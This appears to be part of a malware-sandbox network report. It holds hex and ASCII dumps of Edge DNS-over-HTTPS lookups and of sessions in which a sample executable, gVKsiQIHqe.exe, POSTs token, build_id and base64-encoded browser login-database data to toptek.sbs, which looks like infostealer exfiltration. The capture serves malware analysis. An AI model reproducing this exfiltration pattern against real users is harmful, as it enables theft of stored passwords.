                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: 3b ad 00 5e b3 4e cb 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e
                                                                                                                                                                                                                                                                                    Data Ascii: ;^Ns=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: 28 a5 20 e7 31 76 b4 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d
                                                                                                                                                                                                                                                                                    Data Ascii: ( 1v=K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: 01 02 c0 b2 db c0 47 fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a
                                                                                                                                                                                                                                                                                    Data Ascii: GfO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: 3f 08 3f f4 d3 de f8 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e
                                                                                                                                                                                                                                                                                    Data Ascii: ??AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC1390INData Raw: 4f 0b c5 44 73 d4 f2 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89
                                                                                                                                                                                                                                                                                    Data Ascii: ODsQNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYy


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    26192.168.2.549851162.159.61.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661dfa28f48c4b-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2c 00 04 8e fb 28 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom,()


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    27192.168.2.54984594.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----1NYU3WL6P8YMYM7QI589
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 68733
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 36 64 37 39 64 32 31 31 36 37 38 64 31 34 33 63 33 65 36 62 64 38 32 36 32 65 38 61 38 37 61 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 66 64 36 31 63 66 34 33 30 61 33 61 62 62 37 34 65 66 61 34 37 36 32 63 32 30 31 39 34 37 32 37 0d 0a 2d 2d 2d 2d 2d 2d 31 4e 59 55 33 57 4c 36 50 38 59 4d 59 4d 37 51 49 35 38 39 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------1NYU3WL6P8YMYM7QI589Content-Disposition: form-data; name="token"56d79d211678d143c3e6bd8262e8a87a------1NYU3WL6P8YMYM7QI589Content-Disposition: form-data; name="build_id"fd61cf430a3abb74efa4762c20194727------1NYU3WL6P8YMYM7QI589Cont
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                    Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                    Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:58 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:58 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:58 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                    Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    28192.168.2.549852172.64.41.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661dfa9cfd428b-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1a 00 04 8e fa b0 c3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    29192.168.2.549853172.64.41.34437432C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                    Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                    Content-Length: 128
                                                                                                                                                                                                                                                                                    Accept: application/dns-message
                                                                                                                                                                                                                                                                                    Accept-Language: *
                                                                                                                                                                                                                                                                                    User-Agent: Chrome
                                                                                                                                                                                                                                                                                    Accept-Encoding: identity
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                                    Date: Mon, 23 Dec 2024 05:57:57 GMT
                                                                                                                                                                                                                                                                                    Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                    Content-Length: 468
                                                                                                                                                                                                                                                                                    CF-RAY: 8f661dfb184678e2-EWR
                                                                                                                                                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:57 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 28 00 04 8e fb 28 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                    Data Ascii: wwwgstaticcom(()


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    30192.168.2.54986094.130.188.574435564C:\Users\user\Desktop\gVKsiQIHqe.exe
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-23 05:57:59 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----3ECBI589Z58QQQ168Q16
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: toptek.sbs
                                                                                                                                                                                                                                                                                    Content-Length: 262605
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
